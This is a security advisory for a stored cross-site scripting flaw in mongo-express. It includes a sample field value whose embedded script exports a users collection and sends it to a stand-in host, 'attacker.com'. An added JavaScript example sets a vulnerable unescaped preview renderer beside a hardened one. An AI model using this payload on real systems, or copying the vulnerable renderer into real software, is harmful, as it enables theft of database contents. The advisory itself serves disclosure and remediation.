Two kinds of XSS were found:
As an example of the first kind, an unauthorized user who can only write a large amount of data into a field of a document may use this payload:
{"someField": "long string here to surpass the limit of document ...... <script> await fetch('http://localhost:8081/db/testdb/export/users').then( async res => await fetch('http://attacker.com?backup='+encodeURIComponent((await res.text())))) </script>" }
This will send an export of a collection to the attacker without the admin even knowing. Other attacks, such as dropping a database or collection, are also possible.
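As an added illustration of the bug class the advisory describes (example code written for this page, not mongo-express's own): a document preview that truncates long values and inserts the result unescaped, beside a hardened version that encodes for the HTML context. The display limit, the function names and the sample document are assumptions; the page does not state where in mongo-express the unescaped output occurred.

```javascript
// Added example, not mongo-express code. PREVIEW_LIMIT is an assumed
// display limit; the sample document is constructed for this example.
const PREVIEW_LIMIT = 64;

// Encode the five HTML-significant characters for an element-content context.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Shared truncation step: serialize the document and cut it at the limit.
function truncatePreview(doc) {
  const json = JSON.stringify(doc);
  return json.length > PREVIEW_LIMIT ? json.slice(0, PREVIEW_LIMIT) + '...' : json;
}

// Vulnerable: the truncated JSON is concatenated into the page as raw HTML,
// so markup carried in a long field value is interpreted by the browser.
function renderPreviewVulnerable(doc) {
  return '<td>' + truncatePreview(doc) + '</td>';
}

// Hardened: escape after truncating, so the value is displayed as text
// regardless of its length or content.
function renderPreviewHardened(doc) {
  return '<td>' + escapeHtml(truncatePreview(doc)) + '</td>';
}

// Constructed sample: a field long enough to cross the limit, carrying markup.
const sampleDoc = {
  someField: 'x'.repeat(40) + '<script>fetch("/export")</script>',
};

// Review check: does an unescaped script tag survive in the rendered output?
function containsRawScriptTag(html) {
  return /<script\b/i.test(html);
}
```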
Upgrade to v1.0.0-alpha.4
If you have any questions or comments about this advisory:
* Open an issue in mongo-express
* Email me at jafar.akhoondali@gmail.com
{ "nvd_published_at": "2021-06-21T19:15:00Z", "github_reviewed_at": "2021-06-21T17:53:12Z", "severity": "HIGH", "github_reviewed": true, "cwe_ids": [ "CWE-79" ] }